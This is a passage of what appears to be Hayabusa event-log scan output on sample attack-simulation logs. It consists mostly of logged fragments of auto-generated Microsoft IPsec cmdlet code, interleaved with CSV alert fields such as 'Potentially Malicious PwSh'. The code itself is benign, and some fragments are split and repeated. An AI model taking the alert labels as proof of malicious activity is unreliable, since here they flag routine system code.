[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } 